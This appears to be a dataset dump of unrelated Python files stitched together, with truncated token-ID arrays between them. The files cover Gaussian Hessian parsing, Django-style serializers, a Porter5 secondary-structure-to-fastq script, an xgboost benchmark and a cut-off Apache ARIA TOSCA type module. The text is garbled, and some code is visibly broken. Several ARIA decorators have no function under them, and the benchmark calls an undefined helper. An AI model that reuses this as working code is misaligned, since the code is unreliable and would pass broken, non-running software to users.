    # Use of set to remove redundant keywords
    datablocks = dfobj.read_data(*list(set(full_kwlist)), raise_error=False)
    # Data Parsing
    # ------------
    # Presumably version exposes 'major'/'minor' keys -- the property
    # itself does not document them; verify against __store_keys/parsing.
    gver = (dfobj.version['major'], dfobj.version['minor'])
    try:
        data = parse_data(qty_dict, main_kwlist, datablocks, gver, error_noqty)
    except (QuantityError, NotImplementedError):
        raise QuantityError('Unsupported quantities')
    except (ParseKeyError, IndexError):
        raise IndexError('Missing data in FChk')
    return data
def get_hess_data(natoms: int,
                  get_evec: bool = True,
                  get_eval: bool = True,
                  mweigh: bool = True,
                  dfobj: tp.Optional['FChkIO'] = None,
                  hessvec: tp.Optional[tp.List[float]] = None,
                  hessval: tp.Optional[tp.List[float]] = None,
                  atmass: tp.Optional[tp.List[float]] = None,
                  fccart: tp.Optional[tp.List[float]] = None
                  ) -> tp.Tuple[tp.Any, tp.Any]:
    """Gets or builds Hessian data (eigenvectors and values).

    Retrieves or builds the eigenvectors and eigenvalues of the Hessian
    matrix.  Contrary to ``get_data``, which only looks for available
    data, this function looks for alternative forms to build necessary
    data.  It returns NumPy arrays instead of Python lists.

    Parameters
    ----------
    natoms
        Number of atoms (must be > 1).
    get_evec
        Return the eigenvectors.
    get_eval
        Return the eigenvalues.
    mweigh
        Mass-weight the eigenvectors (L = L/M^(-1/2)) for conversions.
    dfobj
        Formatted checkpoint file as `FChkIO` object.
    hessvec
        Eigenvectors of the Hessian matrix.
    hessval
        Eigenvalues of the Hessian matrix (in cm^-1).
    atmass
        Atomic masses.
    fccart
        Cartesian force constants matrix.

    Returns
    -------
    :obj:`numpy.ndarray`
        Eigenvectors (None if not requested).
    :obj:`numpy.ndarray`
        Eigenvalues (None if not requested).

    Raises
    ------
    ValueError
        Inconsistent values given in input.
    IOError
        File object not set but needed.
    IndexError
        Quantity not found.

    Notes
    -----
    * NumPy is needed to run this function.
    * Data can be given in argument or will be extracted from `dfobj`.
    """
    import numpy as np

    if not (get_evec or get_eval):
        raise ValueError('Nothing to do')
    if natoms <= 1:
        raise ValueError('Number of atoms must be positive')
    # Work out which quantities are missing and must be read from file.
    read_data = []
    if get_evec:
        if hessvec is None and fccart is None:
            read_data.append('hessvec')
        # Masses are always needed to fix the normalization of the modes.
        if atmass is None:
            read_data.append('atmas')
    if get_eval:
        if hessval is None and fccart is None:
            read_data.append('hessval')
    # Defined unconditionally so the membership tests below never hit an
    # unbound name.
    dfdata = {}
    if read_data:
        if dfobj is None:
            raise IOError('Missing checkpoint file to extract necessary data')
        # Try the stored eigenvectors first; if absent from the file,
        # fall back to the Cartesian force constants (diagonalization,
        # not yet implemented).
        # FIX: the previous code called read_data.index('hessvec')
        # unconditionally, raising ValueError whenever 'hessvec' was not
        # scheduled (e.g. eigenvalues-only requests).
        if 'hessvec' in read_data:
            try:
                dfdata.update(get_data(dfobj, 'hessvec'))
                read_data.remove('hessvec')
            except IndexError:
                pos = read_data.index('hessvec')
                read_data[pos] = ep.build_qlabel(1, None, 2, 'X')
                if 'atmas' not in read_data:
                    read_data.append('atmas')
        # FIX: get_data() returns None when called without labels, so
        # only query the file if something is actually left to read.
        if read_data:
            dfdata.update(get_data(dfobj, *read_data))
    eigvec, eigval = None, None
    if get_evec:
        # Repeat each atomic mass for the x, y, z components.
        if atmass is None:
            atmas = np.repeat(np.array(dfdata['atmas']), 3)
        else:
            atmas = np.repeat(np.array(atmass), 3)
        if hessvec is not None or 'hessvec' in dfdata:
            raw = hessvec if hessvec is not None else dfdata['hessvec']
            # Fortran order: data are stored mode by mode (columns).
            eigvec = np.array(raw).reshape((3*natoms, -1), order='F')
            # Reduced masses, used to renormalize the eigenvectors.
            redmas = np.einsum('ij,ij,i->j', eigvec, eigvec, atmas)
            if mweigh:
                # Simply correct the normalization, already weighted by
                # default.
                eigvec = eigvec / np.sqrt(redmas)
            else:
                # FIX: sqrt(atmas) scales rows (Cartesian components),
                # so it must broadcast along axis 0; the previous code
                # broadcast it along the mode axis, which crashed for
                # non-square eigenvector matrices.
                eigvec = eigvec * np.sqrt(atmas)[:, np.newaxis] \
                    / np.sqrt(redmas)
        else:
            raise NotImplementedError('Diagonalization NYI')
    if get_eval:
        if hessval is not None or 'hessval' in dfdata:
            eigval = np.array(hessval if hessval is not None
                              else dfdata['hessval'])
        else:
            raise NotImplementedError('Diagonalization NYI')
    # Transpose eigvec to have a C/Python compliant data order.
    # FIX: guarded so get_evec=False no longer crashes on None.
    if eigvec is not None:
        eigvec = eigvec.transpose()
    return eigvec, eigval
| [
37811,
20535,
12,
5715,
4560,
319,
12822,
31562,
39559,
26954,
3696,
13,
198,
198,
15946,
1460,
1877,
12,
5715,
20314,
284,
18510,
14,
2302,
974,
1366,
287,
12822,
31562,
198,
220,
39559,
26954,
3696,
13,
198,
198,
29021,
198,
35937,
19... | 1.972121 | 21,593 |
def _attrgetter_with_default(attr, default):
    """
    It returns a function that can be called with an object to get the value
    of attr or the default.
    Useful to convert None values to ''.
    """
    # BUGFIX: the original body returned a name that was never defined,
    # raising NameError at call time; define the closure it documents.
    def _getter(obj):
        value = getattr(obj, attr)
        return value if value is not None else default
    return _getter
def id_name_dict(obj):
    """Serialises ``obj`` to a dict holding its ``id`` and ``name`` (or None)."""
    if obj is None:
        return None
    serialised = {'id': str(obj.id)}
    serialised['name'] = obj.name
    return serialised
def id_name_list_of_dicts(manager):
    """Serialises every object yielded by ``manager`` to an id/name dict."""
    return [id_name_dict(item) for item in manager.all()]
def id_type_dict(obj):
    """Serialises ``obj`` to a dict holding its ``id`` and ``type`` (or None)."""
    if obj is None:
        return None
    return dict(id=str(obj.id), type=obj.type)
def id_uri_dict(obj):
    """Serialises ``obj`` to a dict holding its ``id`` and ``uri`` (or None)."""
    return None if obj is None else {
        'id': str(obj.id),
        'uri': obj.uri,
    }
def address_dict(obj, prefix='address'):
    """
    Builds a nested address dict from the ``prefix``-named fields of ``obj``.

    Returns None when ``obj`` is None or when every extracted field is empty.
    """
    if obj is None:
        return None
    field_getters = {
        'line_1': _attrgetter_with_default(f'{prefix}_1', ''),
        'line_2': _attrgetter_with_default(f'{prefix}_2', ''),
        'town': _attrgetter_with_default(f'{prefix}_town', ''),
        'county': _attrgetter_with_default(f'{prefix}_county', ''),
        'postcode': _attrgetter_with_default(f'{prefix}_postcode', ''),
        'area': lambda instance: id_name_dict(
            getattr(instance, f'{prefix}_area'),
        ),
        'country': lambda instance: id_name_dict(
            getattr(instance, f'{prefix}_country'),
        ),
    }
    address = {}
    for field_name, getter in field_getters.items():
        address[field_name] = getter(obj)
    # An address with no populated field at all is treated as absent.
    return address if any(address.values()) else None
def company_dict(obj):
    """Serialises a company to ``id``/``name``/``trading_names`` (or None)."""
    return None if obj is None else {
        'id': str(obj.id),
        'name': obj.name,
        'trading_names': obj.trading_names,
    }
def contact_or_adviser_dict(obj, include_dit_team=False):
    """
    Serialises a contact or adviser to a plain dict.

    When ``include_dit_team`` is set, a ``dit_team`` key is always present:
    either an id/name dict or an empty dict when the adviser has no team.
    """
    if obj is None:
        return None
    serialised = {
        'id': str(obj.id),
        'first_name': obj.first_name,
        'last_name': obj.last_name,
        'name': obj.name,
    }
    if include_dit_team:
        team = obj.dit_team
        serialised['dit_team'] = id_name_dict(team) if team else {}
    return serialised
def contact_or_adviser_list_of_dicts(manager):
    """Serialises every contact or adviser yielded by ``manager``."""
    return [contact_or_adviser_dict(item) for item in manager.all()]
def adviser_dict_with_team(obj):
    """Serialises an adviser together with the adviser's DIT team."""
    return contact_or_adviser_dict(obj, True)
def _computed_nested_dict(nested_field, dict_func):
    """Creates a dictionary from a nested field using dict_func."""
    # BUGFIX: the original body returned an undefined name, raising
    # NameError at call time; define the closure it documents.
    # ``nested_field`` may be a dotted path (e.g. 'project.sector').
    def get_dict(obj):
        value = obj
        for attr in nested_field.split('.'):
            value = getattr(value, attr)
        return dict_func(value)
    return get_dict
def computed_field_function(function_name, dict_func):
    """Create a dictionary from a result of provided function call."""
    # BUGFIX: the original body returned an undefined name, raising
    # NameError at call time; define the closure it documents.  The named
    # method is looked up on the object and called with no arguments.
    def get_dict(obj):
        return dict_func(getattr(obj, function_name)())
    return get_dict
def computed_nested_id_name_dict(nested_field):
    """Builds a getter returning an id/name dict for a nested field."""
    return _computed_nested_dict(nested_field, dict_func=id_name_dict)
def computed_nested_sector_dict(nested_field):
    """Builds a getter returning a sector dict for a nested field."""
    return _computed_nested_dict(nested_field, dict_func=sector_dict)
def ch_company_dict(obj):
    """Serialises a Companies House company to ``id``/``company_number``."""
    return None if obj is None else {
        'id': str(obj.id),
        'company_number': obj.company_number,
    }
def investment_project_dict(obj):
    """Serialises an investment project to ``id``/``name``/``project_code``."""
    if obj is None:
        return None
    return dict(id=str(obj.id), name=obj.name, project_code=obj.project_code)
def sector_dict(obj):
    """Serialises a sector, including the IDs of its ancestor sectors."""
    if obj is None:
        return None
    ancestor_ids = [
        {'id': str(ancestor.id)} for ancestor in obj.get_ancestors()
    ]
    return {
        'id': str(obj.id),
        'name': obj.name,
        'ancestors': ancestor_ids,
    }
def interaction_dict(obj):
    """Serialises an interaction to ``id``/``date``/``subject`` (or None)."""
    if obj is None:
        return None
    return dict(id=str(obj.id), date=obj.date, subject=obj.subject)
def _list_of_dicts(dict_factory, manager):
    """Applies ``dict_factory`` to every object the manager yields."""
    return list(map(dict_factory, manager.all()))
| [
4299,
4808,
35226,
1136,
353,
62,
4480,
62,
12286,
7,
35226,
11,
4277,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
632,
5860,
257,
2163,
326,
460,
307,
1444,
351,
281,
2134,
284,
651,
262,
1988,
198,
220,
220,
220,
286,
7... | 2.42716 | 2,025 |
#If using biowulf, one has to configure an enviornment that contains pandas, as it doesn't seem to be(?) an availible module with python3
#example, type something like this:
#source /data/belfordak/Buck_lab/conda/etc/profile.d/conda.sh
#conda activate base
#conda activate all_libs (just an env with pandas and other packages)
#done with: conda create -n all_libs python=3.6 numpy scipy pandas biopython
#python
#this script produces the fastqish file from the Porter5 output
#!/usr/bin/env python
import numpy as np
from math import *
import pandas as pd
import sys, re, os
import csv
# Load the Porter5 per-residue prediction table (TSV path from first CLI arg).
infile = pd.read_csv(sys.argv[1],delimiter = '\t' )
#verified works
# Highest class probability per residue; columns 3..-2 cover the per-state
# probability columns of both SS3 and SS8 outputs.
maxval= infile.iloc[:,3:-1].max(axis=1) #to work for both ss3 and ss8
# Phred-style quality from the top probability: -10*log10(P(error)).
# NOTE(review): maxval == 1.0 gives log10(0) -> inf; assumes upstream
# probabilities stay below 1 — confirm.
phred_calc = (-10)*np.log10(1-(maxval))
infile['phred_calc'] = phred_calc
#for ASCII generation from phred score:
my_dictionary= {
(0) : '!',
(1) : '\"',
(2) : '#',
(3) : '$',
(4) : '%',
(5) : '&',
(6) : "\'",
(7) : '(',
(8) : ')',
(9) : '*',
(10) : '+',
(11) : ',',
(12) : '-',
(13) : '.',
(14) : '/',
(15) : '0',
(16) : '1',
(17) : '2',
(18) : '3',
(19) : '4',
(20) : '5',
(21) : '6',
(22) : '7',
(23) : '8',
(24) : '9',
(25) : ':',
(26) : ';',
(27) : '<',
(28) : '=',
(29) : '>',
(30) : '?',
(31) : '@',
(32) : 'A',
(33) : 'B',
(34) : 'C',
(35) : 'D',
(36) : 'E',
(37) : 'F',
(38) : 'G',
(39) : 'H',
(40) : 'I',
(41) : 'J',
(42) : 'K'
}
# Integer quality per residue (floor keeps float dtype; float 10.0 still
# hashes equal to int key 10 in the mapping below).
ASCII = infile['phred_calc'].apply(np.floor)
# with var assignment
# NOTE(review): qualities above 42 (or inf) are absent from my_dictionary
# and map to NaN here — confirm that cannot occur upstream.
infile['ASCII']= ASCII.map(my_dictionary)
#Transposing
infile_transposed_in = infile.T
#print(infile_transposed_in)
# Keep only the secondary-structure and quality rows, then join each row's
# cells into one string: concat_test[0] is the SS string, concat_test[1]
# the quality string.
fastqish_but_cols = infile_transposed_in.loc[['SS', 'ASCII'],:]
concat_test_temp = pd.Series(fastqish_but_cols.fillna('').values.tolist()).str.join('')
concat_test = np.array(concat_test_temp)
#Part 2: pulling seq names and "+" separator (lines 0 and 2)
infile_name = sys.argv[1]
#1. read in temp_porter5_submission.swarm as list_seq_XX
#note: I'm not sure if this will be the final path (maybe we'll want it back 1 dir?)
#all_seqs.list created in pre_pre_processing script
with open("temp_porter5_submission.swarm") as f:
    list_seq_XX = f.readlines()
list_seq_XX = [x.strip() for x in list_seq_XX]
# Numeric sort on the digits between '_' and '.' — assumes entries look like
# 'seq_12.fasta'; a plain lexical sort would order 9,10,100,101 wrongly.
y = sorted(list_seq_XX, key = lambda item: int(item.partition('_')[2].partition('.')[0]))
#print(y) above was for sorting so order was ...9,10,11,12 instead of 9,10,100,101, etc. Lib would have been incorrect otherwise
# for getting rid of .fasta. We're going to just use the seq_00 part to search in dict
# Strip the extension: keep only the part before the first '.'.
x = []
for line in y:
    part = line.split(".")
    #x = part[0]
    #print(x)
    x.append(part[0])
#print(x)
list_seq_XX_fin = x
#2. read original.fa as list, but only lines that start with ">"
original_fasta = sys.argv[2]
with open(original_fasta,"r") as f:
    id_temp = []
    for ln in f:
        if ln.startswith(">"):
            x = ln
            id_temp.append(x)
list_seq_fa_orig = [x.strip() for x in id_temp]
#3. dictionary from the two lists
# NOTE(review): zip pairs positionally — assumes the swarm list and the
# FASTA headers have the same length and ordering; confirm upstream.
keys = list_seq_XX_fin #id_temp_clean in test
values = list_seq_fa_orig
dict_for_name_appends = dict(zip(keys, values))
#3.5 make index file
with open('index_file.csv', 'w') as f:
    write_dict = csv.writer(f)
    for key, value in dict_for_name_appends.items():
        write_dict.writerow([key, value])
#4 parse file name for key val search
sep = os.path.basename(infile_name).split('.')[0]
#5. if filename = key, print value as line 0 in file
#replace > with @
# Swap the FASTA '>' prefix for the FASTQ '@' prefix.
dict_var = dict_for_name_appends[sep]
temp = list(dict_var)
temp[0] = "@"
dict_var = "".join(temp)
#print(dict_var)
# Emit the four FASTQ-style lines: @name, SS string, '+', quality string.
f_out = open((infile_name + '.fastqish'), 'w')
f_out.write(str(dict_var + "\n" + concat_test[0] + "\n" + "+" + "\n" +concat_test[1]))
f_out.close()
| [
2,
1532,
1262,
3182,
322,
4754,
11,
530,
468,
284,
17425,
281,
551,
8903,
1211,
434,
326,
4909,
19798,
292,
11,
355,
340,
1595,
470,
1283,
284,
307,
7,
10091,
281,
29107,
856,
8265,
351,
21015,
18,
198,
2,
20688,
11,
2099,
1223,
5... | 2.221837 | 1,731 |
# Copyright (C) 2020 Intel Corporation
#
# SPDX-License-Identifier: MIT
import argparse
from bench import (
parse_args, measure_function_time, load_data, print_output,
accuracy_score, rmse_score
)
import numpy as np
import xgboost as xgb
import os
# Command-line interface for the gradient-boosted-trees benchmark; most
# options mirror xgboost training parameters one-to-one.
parser = argparse.ArgumentParser(description='xgboost gradient boosted trees '
                                             'benchmark')

parser.add_argument('--n-estimators', type=int, default=100,
                    help='Number of gradient boosted trees')
# BUGFIX: help text read 'to prevents overfitting'.
parser.add_argument('--learning-rate', '--eta', type=float, default=0.3,
                    help='Step size shrinkage used in update '
                         'to prevent overfitting')
parser.add_argument('--min-split-loss', '--gamma', type=float, default=0,
                    help='Minimum loss reduction required to make'
                         ' partition on a leaf node')
parser.add_argument('--max-depth', type=int, default=6,
                    help='Maximum depth of a tree')
parser.add_argument('--min-child-weight', type=float, default=1,
                    help='Minimum sum of instance weight needed in a child')
parser.add_argument('--max-delta-step', type=float, default=0,
                    help='Maximum delta step we allow each leaf output to be')
parser.add_argument('--subsample', type=float, default=1,
                    help='Subsample ratio of the training instances')
parser.add_argument('--colsample-bytree', type=float, default=1,
                    help='Subsample ratio of columns '
                         'when constructing each tree')
parser.add_argument('--reg-lambda', type=float, default=1,
                    help='L2 regularization term on weights')
parser.add_argument('--reg-alpha', type=float, default=0,
                    help='L1 regularization term on weights')
parser.add_argument('--tree-method', type=str, required=True,
                    help='The tree construction algorithm used in XGBoost')
parser.add_argument('--scale-pos-weight', type=float, default=1,
                    help='Controls a balance of positive and negative weights')
parser.add_argument('--grow-policy', type=str, default='depthwise',
                    help='Controls a way new nodes are added to the tree')
parser.add_argument('--max-leaves', type=int, default=0,
                    help='Maximum number of nodes to be added')
parser.add_argument('--max-bin', type=int, default=256,
                    help='Maximum number of discrete bins to '
                         'bucket continuous features')
# BUGFIX: help text was copy-pasted from --scale-pos-weight.
parser.add_argument('--objective', type=str, required=True,
                    choices=('reg:squarederror', 'binary:logistic',
                             'multi:softmax', 'multi:softprob'),
                    help='Learning objective (task) for the model')
parser.add_argument('--count-dmatrix', default=False, action='store_true',
                    help='Count DMatrix creation in time measurements')
parser.add_argument('--single-precision-histogram', default=False, action='store_true',
                    help='Build histograms instead of double precision')
# NOTE(review): default is bool True but the choices are the strings
# 'True'/'False', so the parsed value's type depends on whether the flag
# is passed explicitly — confirm downstream handling.
parser.add_argument('--enable-experimental-json-serialization', default=True,
                    choices=('True', 'False'), help='Use JSON to store memory snapshots')
params = parse_args(parser)

# Load and convert data
X_train, X_test, y_train, y_test = load_data(params)

# Map the parsed CLI options onto xgboost's native training parameters.
# NOTE(review): 'seed' is not declared above, so it presumably comes from
# bench.parse_args — confirm.
xgb_params = {
    'booster': 'gbtree',
    'verbosity': 0,
    'learning_rate': params.learning_rate,
    'min_split_loss': params.min_split_loss,
    'max_depth': params.max_depth,
    'min_child_weight': params.min_child_weight,
    'max_delta_step': params.max_delta_step,
    'subsample': params.subsample,
    'sampling_method': 'uniform',
    'colsample_bytree': params.colsample_bytree,
    'colsample_bylevel': 1,
    'colsample_bynode': 1,
    'reg_lambda': params.reg_lambda,
    'reg_alpha': params.reg_alpha,
    'tree_method': params.tree_method,
    'scale_pos_weight': params.scale_pos_weight,
    'grow_policy': params.grow_policy,
    'max_leaves': params.max_leaves,
    'max_bin': params.max_bin,
    'objective': params.objective,
    'seed': params.seed,
    'single_precision_histogram': params.single_precision_histogram,
    'enable_experimental_json_serialization': params.enable_experimental_json_serialization
}
if params.threads != -1:
    xgb_params.update({'nthread': params.threads})
# OMP_NUM_THREADS, when set, overrides the --threads option.
if 'OMP_NUM_THREADS' in os.environ.keys():
    xgb_params['nthread'] = int(os.environ['OMP_NUM_THREADS'])
columns = ('batch', 'arch', 'prefix', 'function', 'threads', 'dtype', 'size',
           'num_trees')
# Regression objectives are scored with RMSE, everything else with accuracy.
if params.objective.startswith('reg'):
    task = 'regression'
    metric_name, metric_func = 'rmse', rmse_score
    columns += ('rmse', 'time')
else:
    task = 'classification'
    metric_name = 'accuracy[%]'
    metric_func = lambda y1, y2: 100 * accuracy_score(y1, y2)
    columns += ('n_classes', 'accuracy', 'time')
    # cuDF frames have no np-compatible unique; count via nunique instead.
    if 'cudf' in str(type(y_train)):
        params.n_classes = y_train[y_train.columns[0]].nunique()
    else:
        params.n_classes = len(np.unique(y_train))
    if params.n_classes > 2:
        xgb_params['num_class'] = params.n_classes

dtrain = xgb.DMatrix(X_train, y_train)
dtest = xgb.DMatrix(X_test, y_test)
# BUGFIX: the original 'if/else' had empty bodies (a SyntaxError) — the
# fit/predict definitions they were meant to contain are restored here.
if params.count_dmatrix:
    # Rebuild the DMatrix inside the timed region so its construction cost
    # is included in the measurement.
    def fit():
        """Train a booster, timing DMatrix creation as well."""
        return xgb.train(xgb_params, xgb.DMatrix(X_train, y_train),
                         params.n_estimators)

    def predict():
        """Predict on the test set, timing DMatrix creation as well."""
        return booster.predict(xgb.DMatrix(X_test, y_test))
else:
    def fit():
        """Train a booster on the pre-built training DMatrix."""
        return xgb.train(xgb_params, dtrain, params.n_estimators)

    def predict():
        """Predict on the pre-built test DMatrix."""
        return booster.predict(dtest)

fit_time, booster = measure_function_time(fit, params=params)
# NOTE(review): convert_xgb_predictions is not defined or imported in the
# visible code — it is presumably exported by the bench module; confirm.
y_pred = convert_xgb_predictions(booster.predict(dtrain), params.objective)
train_metric = metric_func(y_pred, y_train)

predict_time, y_pred = measure_function_time(predict, params=params)
test_metric = metric_func(
    convert_xgb_predictions(y_pred, params.objective), y_test)

print_output(library='xgboost', algorithm=f'gradient_boosted_trees_{task}',
             stages=['training', 'prediction'], columns=columns,
             params=params, functions=['gbt.fit', 'gbt.predict'],
             times=[fit_time, predict_time], accuracy_type=metric_name,
             accuracies=[train_metric, test_metric], data=[X_train, X_test],
             alg_instance=booster)
| [
2,
15069,
357,
34,
8,
12131,
8180,
10501,
198,
2,
198,
2,
30628,
55,
12,
34156,
12,
33234,
7483,
25,
17168,
198,
198,
11748,
1822,
29572,
198,
6738,
7624,
1330,
357,
198,
220,
220,
220,
21136,
62,
22046,
11,
3953,
62,
8818,
62,
24... | 2.419265 | 2,502 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from aria.utils.collections import (FrozenDict, FrozenList)
from aria.utils.caching import cachedmethod
from aria.parser import implements_specification
from aria.parser.presentation import (has_fields, allow_unknown_fields, primitive_field,
primitive_list_field, object_field, object_dict_field,
object_list_field, object_sequenced_list_field,
object_dict_unknown_fields, field_getter, field_validator,
list_type_validator, derived_from_validator,
get_parent_presentation)
from .assignments import ArtifactAssignmentForType
from .data_types import Version
from .definitions import (PropertyDefinition, AttributeDefinition, InterfaceDefinition,
RequirementDefinition, CapabilityDefinition, OperationDefinition)
from .misc import (Description, ConstraintClause)
from .modeling.artifacts import get_inherited_artifact_definitions
from .modeling.capabilities import (get_inherited_valid_source_types,
get_inherited_capability_definitions)
from .modeling.data_types import (get_data_type, get_inherited_constraints, coerce_data_type_value,
validate_data_type_name)
from .modeling.interfaces import (get_inherited_interface_definitions, get_inherited_operations)
from .modeling.groups import get_inherited_members
from .modeling.policies import get_inherited_targets
from .modeling.parameters import get_inherited_parameter_definitions
from .modeling.requirements import get_inherited_requirement_definitions
from .presentation.extensible import ExtensiblePresentation
from .presentation.field_getters import data_type_class_getter
from .presentation.field_validators import (data_type_derived_from_validator,
data_type_constraints_validator,
data_type_properties_validator,
list_node_type_or_group_type_validator)
from .presentation.types import convert_name_to_full_type_name
@has_fields
@implements_specification('3.6.3', 'tosca-simple-1.0')
class ArtifactType(ExtensiblePresentation):
    """
    An Artifact Type is a reusable entity that defines the type of one or more files that are used
    to define implementation or deployment artifacts that are referenced by nodes or relationships
    on their operations.
    See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
    /TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
    #DEFN_ENTITY_ARTIFACT_TYPE>`__
    """
    @field_validator(derived_from_validator(convert_name_to_full_type_name, 'artifact_types'))
    @primitive_field(str)
    def derived_from(self):
        """
        An optional parent Artifact Type name the Artifact Type derives from.
        :type: :obj:`basestring`
        """
    @field_getter(data_type_class_getter(Version))
    @primitive_field(str)
    def version(self):
        """
        An optional version for the Artifact Type definition.
        :type: :class:`Version`
        """
    @object_field(Description)
    def description(self):
        """
        An optional description for the Artifact Type.
        :type: :class:`Description`
        """
    @primitive_field(str)
    def mime_type(self):
        """
        The required mime type property for the Artifact Type.
        :type: :obj:`basestring`
        """
    @primitive_list_field(str)
    def file_ext(self):
        """
        The required file extension property for the Artifact Type.
        :type: [:obj:`basestring`]
        """
    @object_dict_field(PropertyDefinition)
    def properties(self):
        """
        An optional list of property definitions for the Artifact Type.
        :type: {:obj:`basestring`: :class:`PropertyDefinition`}
        """
    # NOTE(review): the following @cachedmethod decorators are not followed
    # by a function definition — the decorated methods (e.g. _get_parent /
    # _get_properties in upstream ARIA) appear to have been stripped; this
    # will not parse until they are restored.
    @cachedmethod
    @cachedmethod
@has_fields
@implements_specification('3.6.5', 'tosca-simple-1.0')
class DataType(ExtensiblePresentation):
    """
    A Data Type definition defines the schema for new named datatypes in TOSCA.
    See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
    /TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
    #DEFN_ENTITY_DATA_TYPE>`__
    """
    @field_validator(data_type_derived_from_validator)
    @primitive_field(str)
    def derived_from(self):
        """
        The optional key used when a datatype is derived from an existing TOSCA Data Type.
        :type: :obj:`basestring`
        """
    @field_getter(data_type_class_getter(Version))
    @primitive_field(str)
    def version(self):
        """
        An optional version for the Data Type definition.
        :type: :class:`Version`
        """
    @object_field(Description)
    def description(self):
        """
        The optional description for the Data Type.
        :type: :class:`Description`
        """
    @field_validator(data_type_constraints_validator)
    @object_list_field(ConstraintClause)
    def constraints(self):
        """
        The optional list of sequenced constraint clauses for the Data Type.
        :type: list of (str, :class:`ConstraintClause`)
        """
    @field_validator(data_type_properties_validator)
    @object_dict_field(PropertyDefinition)
    def properties(self):
        """
        The optional list property definitions that comprise the schema for a complex Data Type in
        TOSCA.
        :type: {:obj:`basestring`: :class:`PropertyDefinition`}
        """
    # NOTE(review): the following @cachedmethod decorators are not followed
    # by function definitions — the decorated methods appear to have been
    # stripped; restore them from upstream ARIA before use.
    @cachedmethod
    @cachedmethod
    @cachedmethod
    @cachedmethod
    @cachedmethod
@has_fields
@implements_specification('3.6.6', 'tosca-simple-1.0')
class CapabilityType(ExtensiblePresentation):
    """
    A Capability Type is a reusable entity that describes a kind of capability that a Node Type can
    declare to expose. Requirements (implicit or explicit) that are declared as part of one node can
    be matched to (i.e., fulfilled by) the Capabilities declared by another node.
    See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
    /TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
    #DEFN_ENTITY_CAPABILITY_TYPE>`__
    """
    @field_validator(derived_from_validator(convert_name_to_full_type_name, 'capability_types'))
    @primitive_field(str)
    def derived_from(self):
        """
        An optional parent capability type name this new Capability Type derives from.
        :type: :obj:`basestring`
        """
    @field_getter(data_type_class_getter(Version))
    @primitive_field(str)
    def version(self):
        """
        An optional version for the Capability Type definition.
        :type: :class:`Version`
        """
    @object_field(Description)
    def description(self):
        """
        An optional description for the Capability Type.
        :type: :class:`Description`
        """
    @object_dict_field(PropertyDefinition)
    def properties(self):
        """
        An optional list of property definitions for the Capability Type.
        ARIA NOTE: The spec says 'list', but the examples are all of dicts.
        :type: {:obj:`basestring`: :class:`PropertyDefinition`}
        """
    @object_dict_field(AttributeDefinition)
    def attributes(self):
        """
        An optional list of attribute definitions for the Capability Type.
        :type: {:obj:`basestring`: :class:`AttributeDefinition`}
        """
    @field_validator(list_type_validator('node type', convert_name_to_full_type_name, 'node_types'))
    @primitive_list_field(str)
    def valid_source_types(self):
        """
        An optional list of one or more valid names of Node Types that are supported as valid
        sources of any relationship established to the declared Capability Type.
        :type: [:obj:`basestring`]
        """
    # NOTE(review): _is_descendant carries two stacked @cachedmethod
    # decorators — the first likely belonged to a stripped method
    # (e.g. _get_parent in upstream ARIA); confirm against upstream.
    @cachedmethod
    @cachedmethod
    def _is_descendant(self, context, other_type):
        """
        Checks if ``other_type`` is our descendant (or equal to us).
        """
        # Walk up the derived_from chain until we hit ourselves or the root.
        if other_type is None:
            return False
        elif other_type._name == self._name:
            return True
        return self._is_descendant(context, other_type._get_parent(context))
    # NOTE(review): the following @cachedmethod decorators are not followed
    # by function definitions — the decorated methods appear to have been
    # stripped; restore them from upstream ARIA before use.
    @cachedmethod
    @cachedmethod
    @cachedmethod
@allow_unknown_fields
@has_fields
@implements_specification('3.6.4', 'tosca-simple-1.0')
class InterfaceType(ExtensiblePresentation):
    """
    An Interface Type is a reusable entity that describes a set of operations that can be used to
    interact with or manage a node or relationship in a TOSCA topology.
    See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
    /TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
    #DEFN_ENTITY_INTERFACE_TYPE>`__
    """
    @field_validator(derived_from_validator(convert_name_to_full_type_name, 'interface_types'))
    @primitive_field(str)
    def derived_from(self):
        """
        An optional parent Interface Type name this new Interface Type derives from.
        :type: :obj:`basestring`
        """
    @field_getter(data_type_class_getter(Version))
    @primitive_field(str)
    def version(self):
        """
        An optional version for the Interface Type definition.
        :type: :class:`Version`
        """
    @object_field(Description)
    def description(self):
        """
        An optional description for the Interface Type.
        :type: :class:`Description`
        """
    @object_dict_field(PropertyDefinition)
    def inputs(self):
        """
        The optional list of input parameter definitions.
        :type: {:obj:`basestring`: :class:`PropertyDefinition`}
        """
    # Unknown fields on an interface type are treated as operations.
    @object_dict_unknown_fields(OperationDefinition)
    def operations(self):
        """
        :type: {:obj:`basestring`: :class:`OperationDefinition`}
        """
    # NOTE(review): the following @cachedmethod decorators are not followed
    # by function definitions — the decorated methods appear to have been
    # stripped; restore them from upstream ARIA before use.
    @cachedmethod
    @cachedmethod
    @cachedmethod
    @cachedmethod
@has_fields
@implements_specification('3.6.9', 'tosca-simple-1.0')
class RelationshipType(ExtensiblePresentation):
    """
    A Relationship Type is a reusable entity that defines the type of one or more relationships
    between Node Types or Node Templates.
    See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
